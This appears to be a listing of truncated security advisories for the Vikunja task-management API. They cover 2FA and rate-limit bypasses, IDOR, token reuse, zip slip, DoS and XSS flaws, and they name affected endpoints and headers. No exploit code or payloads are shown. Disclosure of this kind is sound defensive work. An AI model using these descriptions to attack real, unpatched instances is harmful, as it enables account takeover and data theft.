Code.Vikunja.Io Api vulnerabilities

CVE-2026-33315 [MEDIUM] CWE-288 Vikunja has a 2FA Bypass via Caldav Basic Auth Vikunja has a 2FA Bypass via Caldav Basic Auth ### Summary The Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc. ### Details The two files below show that when a user is accessing Caldav vi

CVE-2026-29794 [MEDIUM] CWE-807 Vikunja has a Rate-Limit Bypass for Unauthenticated Users via Spoofed Headers Vikunja has a Rate-Limit Bypass for Unauthenticated Users via Spoofed Headers ### Summary Unauthenticated users are able to bypass the application's built-in rate-limits by spoofing the `X-Forwarded-For` or `X-Real-IP` headers due to the rate-limit relying on the value of `(echo.Context).RealIP`. ### Details In the first file below, the rate-limit for unauthenticated users can be obser

CVE-2026-33313 [MEDIUM] CWE-639 Vikunja has an IDOR in Task Comments Allows Reading Arbitrary Comments Vikunja has an IDOR in Task Comments Allows Reading Arbitrary Comments An authenticated user can read any task comment by ID, regardless of whether they have access to the task the comment belongs to, by substituting the task ID in the API URL with a task they do have access to. ## Details The `GET /api/v1/tasks/{taskID}/comments/{commentID}` endpoint performs an authorization check against

CVE-2026-33473 [MEDIUM] CWE-287 Vikunja has TOTP Reuse During Validity Window Vikunja has TOTP Reuse During Validity Window ### Summary Any user that has enabled 2FA can have their TOTP reused during the standard 30 second validity window. ### Details The below code is called when a user that has 2FA is authenticating to the application. Once they submit a valid username-password-totp combination, the user gets authenticated. If that same TOTP is used for the same user's account again within t

CVE-2026-33312 [MEDIUM] CWE-863 Vikunja read-only users can delete project background images via broken object-level authorization Vikunja read-only users can delete project background images via broken object-level authorization ## Summary The `DELETE /api/v1/projects/:project/background` endpoint checks `CanRead` permission instead of `CanUpdate`, allowing any user with read-only access to a project to permanently delete its background image. ## Details The `RemoveProjectBackground` handle

CVE-2026-33474 [MEDIUM] CWE-400 Vikunja Affected by DoS via Image Preview Generation Vikunja Affected by DoS via Image Preview Generation ## Summary - Vulnerability: Unbounded image decoding and resizing during preview generation lets an attacker exhaust CPU and memory with highly compressed but extremely large-dimension images. - Affected code: - Decoding without bounds: [task_attachment.go:GetPreview](../../tree/main/pkg/models/task_attachment.go#L219-L229) - Resizing path: [resizeImage](../.

CVE-2026-28268 [CRITICAL] CWE-459 Vikunja Vulnerable to Account Takeover via Password Reset Token Reuse Vikunja Vulnerable to Account Takeover via Password Reset Token Reuse **Summary** A critical business logic vulnerability exists in the password reset mechanism of vikunja/api that allows password reset tokens to be reused indefinitely. Due to a failure to invalidate tokens upon use and a critical logic bug in the token cleanup cron job, reset tokens remain valid forever. This allows an atta

CVE-2026-27819 [HIGH] CWE-22 Vikunja has Path Traversal in CLI Restore Vikunja has Path Traversal in CLI Restore ### Summary Path Traversal (Zip Slip) and Denial of Service (DoS) vulnerability discovered in the Vikunja CLI's restore functionality. ### Details The restoreConfig function in vikunja/pkg/modules/dump/restore.go of the https://github.com/go-vikunja/vikunja/tree/main repository fails to sanitize file paths within the provided ZIP archive. A maliciously crafted ZIP can bypass the i

CVE-2026-27575 [CRITICAL] CWE-521 Vijkunja has Weak Password Policy Combined with Persistent Sessions After Password Change Vijkunja has Weak Password Policy Combined with Persistent Sessions After Password Change **Summary** The application allows users to set weak passwords (e.g., 1234, password) without enforcing minimum strength requirements. Additionally, active sessions remain valid after a user changes their password. An attacker who compromises an account (via brute-force or credential

CVE-2026-27616 [HIGH] CWE-79 Vikunja: Stored XSS via Unsanitized SVG Attachment Upload Leads to Token Exposure Vikunja: Stored XSS via Unsanitized SVG Attachment Upload Leads to Token Exposure **Details** The application allows users to upload SVG files as task attachments. SVG is an XML-based format that supports JavaScript execution through elements such as tags or event handlers like onload. The application does not sanitize SVG content before storing it. When the uploaded SVG file is acces

CVE-2026-27116 [MEDIUM] CWE-116 Vikunja has Reflected HTML Injection via filter Parameter in its Projects Module Vikunja has Reflected HTML Injection via filter Parameter in its Projects Module ## Summary [Vikunja](https://github.com/go-vikunja/vikunja) is an open-source self-hosted task management platform with 3,300+ GitHub stars. A reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the u

CVE-2026-25935 [HIGH] CWE-79 Vikunja Vulnerable to XSS Via Task Preview Vikunja Vulnerable to XSS Via Task Preview ### Summary The task preview component creates a unparented div. The div's `innerHtml` is set to the unescaped description of the task ### Details In the `TaskGlanceTooltip.vue` it temporarily creates a div and sets the `innerHtml` to the description [here](https://github.com/go-vikunja/vikunja/blob/cdca79032526966cb248b72bddcf2a0f888c8a8f/frontend/src/components/tasks/partials/Ta